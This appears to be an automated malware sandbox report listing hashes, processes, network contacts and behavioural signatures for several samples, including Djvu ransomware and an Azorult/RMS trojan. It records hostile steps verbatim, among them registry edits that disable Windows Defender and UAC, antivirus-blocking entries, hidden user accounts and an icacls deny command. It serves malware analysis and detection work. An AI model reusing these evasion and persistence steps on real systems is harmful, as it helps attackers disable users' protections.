C:\ProgramData\ucp\usc.exe

MD5 b100b373d645bf59b0487dbbda6c426d
SHA1 44a4ad2913f5f35408b8c16459dcce3f101bdcc7
SHA256 84d7fd0a93d963e9808212917f79fe2d485bb7fbc94ee374a141bbd15da725b7
SHA512 69483fed79f33da065b1cc65a2576ba268c78990545070f6f76fca8f48aaec8274faecdc9bcf92bf84a87809a318b159d1a3c835f848a6eea6c163f41612bf9b

C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe

MD5 51bf85f3bf56e628b52d61614192359d
SHA1 c1bc90be6a4beb67fb7b195707798106114ec332
SHA256 990dffdc0694858514d6d7ff7fff5dc9f48fab3aa35a4d9301d94fc57e346446
SHA512 131173f3aabcfba484e972424c54201ec4b1facfb2df1efe08df0d43a816d4df03908b006884564c56a6245badd4f9ed442a295f1db2c0c970a8f80985d35474

memory/1092-55-0x0000000000400000-0x000000000047B000-memory.dmp

memory/760-58-0x000000001B730000-0x000000001BBFE000-memory.dmp

memory/760-59-0x000000001BC00000-0x000000001BC9C000-memory.dmp

memory/760-60-0x0000000000A40000-0x0000000000A48000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\hqsi_zti.cmdline

MD5 d64f5440876fff0be05e6fd89b9cb1cc
SHA1 eefc1787854e938b0036dd8ad9aced46dc7fd08f
SHA256 31a3695e1b61c976626f78d4159fac6db71a2dae1460a4b7ec709cc4b5527769
SHA512 bb3ccb99e5e24c15de5ff384965e3a3853f71a940bd06fb26455c3c5f0f3d8adcd2966b685df5895e677b7b33c49d5446e935c5a667bed6902d6c90c5cdcb005

\??\c:\Users\Admin\AppData\Local\Temp\hqsi_zti.0.cs

MD5 a0d1b6f34f315b4d81d384b8ebcdeaa5
SHA1 794c1ff4f2a28e0c631a783846ecfffdd4c7ae09
SHA256 0b3a3f8f11eb6f50fe67943f2b73c5824614f31c2e0352cc234927d7cb1a52e0
SHA512 0a89293d731c5bca05e73148f85a740b324fc877f2fb05cde1f68e2098329fbca552d78249a46f4a1da15a450c8e754c73be20c652f7089d5cfec445ce950a0e

\??\c:\Users\Admin\AppData\Local\Temp\CSCA7B9.tmp

MD5 9d2d3d79b1136a85f2e8409ec5aa9c5e
SHA1 adaad3338838b7669a48bee51337346a39a2eb00
SHA256 016bd17acbd598e53d52c3a51cec2847cc1a366d670e3fc0416fa7fb68e0e3c2
SHA512 5e6978279364fee3254b3d205e2e4fd8774c2f2272be3f565b8969e9ac007e01b72ebd26a709225c592d4eb8755c6cddc96ed79c2c7221caae29efdf80c3181a

C:\Users\Admin\AppData\Local\Temp\RESA7CA.tmp

MD5 7d8b33f4050b47651733cef60601950f
SHA1 0eb3d60590c42a9850e4f64ef4d6f59e23670425
SHA256 c3d2f36c539b9aa1f78567d2ebf36be2956c56e02fd01457894752397226aa3f
SHA512 809547596023c015c8fc85fa1d810d044e933a8fee45f6160fc4cd779686dd367c2a6ad6ed7f053b1943eb5315c7c996598013e175935cde94e97907ecfc47a4

C:\Users\Admin\AppData\Local\Temp\hqsi_zti.dll

MD5 32bfa4370209018bd90caee40f73c4c7
SHA1 a5df285a6fc8500622261873e26e839261d04ae6
SHA256 ed4eb007e34ca0af2a8547ba90a7295ef0beeec05ed963416cc7b41054b443bc
SHA512 4a369390bc6bd2444939dbd061225c290c0de21bb85633359ec2c4f59b5bcf56ddafeefb28ccd5bf8be8b463fb2b297fbf7ebb01e675645303ace23c8517ba7c

memory/760-74-0x0000000000A60000-0x0000000000A68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hqsi_zti.pdb

MD5 c3711fe194ee721243afc7101bc5dbd0
SHA1 d040cc83c523f173233a4449257edc7d2c904b2a
SHA256 4ef4abb30f7ae24ca7afd8198d3f616599bed5cb3fe3361b4b83b401c41391b3
SHA512 789556923e1368172a518ee6f535b508ced49f8b28c12effcbbbfae0849f99bcffc448d38ef15c819fe08d34b35a44942ec4b1d2556c929a5f9814d8799c2b38

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihttrvbc.01r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral30

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 110s
Max time network 127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\iaStorE.sys C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\MS.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\KeyHook64.dll C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\KH.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\usp20.dll C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\UP.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\spoolsr.exe C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe

"C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe"

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 iostream.system.band udp
US 52.43.119.120:80 iostream.system.band tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp

MD5 4b042bfd9c11ab6a3fb78fa5c34f55d0
SHA1 b0f506640c205d3fbcfe90bde81e49934b870eab
SHA256 59c662a5207c6806046205348b22ee45da3f685fe022556716dbbd6643e61834
SHA512 dae5957c8eee5ae7dd106346f7ea349771b693598f3d4d54abb39940c3d1a0b5731c8d4e07c29377838988a1e93dcd8c2946ce0515af87de61bca6de450409d3

Analysis: behavioral11

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:14
Platform win10v2004-20250502-en
Max time kernel 141s
Max time network 127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe"

Signatures

Detected Djvu ransomware

Djvu Ransomware

ransomware djvu

Djvu family

djvu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\238105d5-acec-4460-a64f-f65c577ece3d\\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\238105d5-acec-4460-a64f-f65c577ece3d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5456 -ip 5456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 1876

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.32.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 dell1.ug udp

Files

C:\Users\Admin\AppData\Local\238105d5-acec-4460-a64f-f65c577ece3d\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

MD5 e15e3cfa542459e8d87e8bfdf70a38a1
SHA1 1c98fbf7b780fc8ab7f73d468ab77b41570c9665
SHA256 c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286
SHA512 fd55639cc4f757f90a01236b10bf33bd678ef7a141c6538a5285133aa8d610bb0bf287043717557a26d28a924f3c44fbf37c13421f27a389f2e8fc76ce4b91fe

memory/5908-15-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 1fbb37f79b317a9a248e7c4ce4f5bac5
SHA1 0ff4d709ebf17be0c28e66dc8bf74672ca28362a
SHA256 6fb1b8e593cb0388f67ead35313a230f524657317ea86271b3a97362e5ec6ad9
SHA512 287e1d62c9ceb660965c266f677c467fbb997c2f5dcd1d63e185e266488aafc3489ac1d3feec81d10f01ce4a72e61a8bc4e124f137ce8675a220aa7797002e74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 87b88cb16bb1e5b40119c371eb576089
SHA1 44765ee94e20a2d8966b55ce55520b805843c709
SHA256 7b0a7367b439b1ce7c129c7f69b8e60aa11783012c2f2708325ba3fca7c8576b
SHA512 d3be82aa0fa9e808e8e5862b7a356208e63404f1bd7de7abb3669a4969e9c8862b18170d4b13dd1e014cbddf56b84fe5072cba24e148fe96e29642ce7d4e6712

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 4a90329071ae30b759d279cca342b0a6
SHA1 0ac7c4f3357ce87f37a3a112d6878051c875eda5
SHA256 fb6a7c3edcd7b97fabc18855102a39fc4d6d3f82c0fdd39b1667807b71b9c49b
SHA512 f0e206053d4369437c2c0f1f90f0fd03d631e4b9859d807049b41efde823d64cf4d75c28316d932360f7c03bd409e923c8bc2d4f5959361feacecfcf101ae823

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 cfc07f9f57af01992ec634040aee5e94
SHA1 31c0bcdb985987f054a0e97095d060b8c069b03d
SHA256 c4bf2907919a7349cecc059f8607621ef795dd3f779c347ddecc2649e639179e
SHA512 502047c54dedd7344f317780f9327715ff69f7600252710bf093daa996f4f65b6ea64bf12e4e078a05ed681aa2c59041a79becfdd46174f2ef68473418ea3f8f

Analysis: behavioral28

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 150s
Max time network 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Modifies visibility of hidden/system files in Explorer

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhostw.exe N/A

RMS

trojan rat rms

Rms family

rms

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Windows security bypass

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\regedit.exe N/A

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net1.exe N/A

Blocks application from running via registry modification

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\conhost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\rdp\RDPWInst.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

defense_evasion execution

ACProtect 1.3x - 1.4x DLL software

ASPack v2.12-2.42

aspackv2
Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\programdata\install\cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\programdata\microsoft\intel\R8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Password Policy Discovery

discovery

AutoIT Executable

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\rfxvmt.dll C:\rdp\RDPWInst.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\iexplore.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files (x86)\Zaxar C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
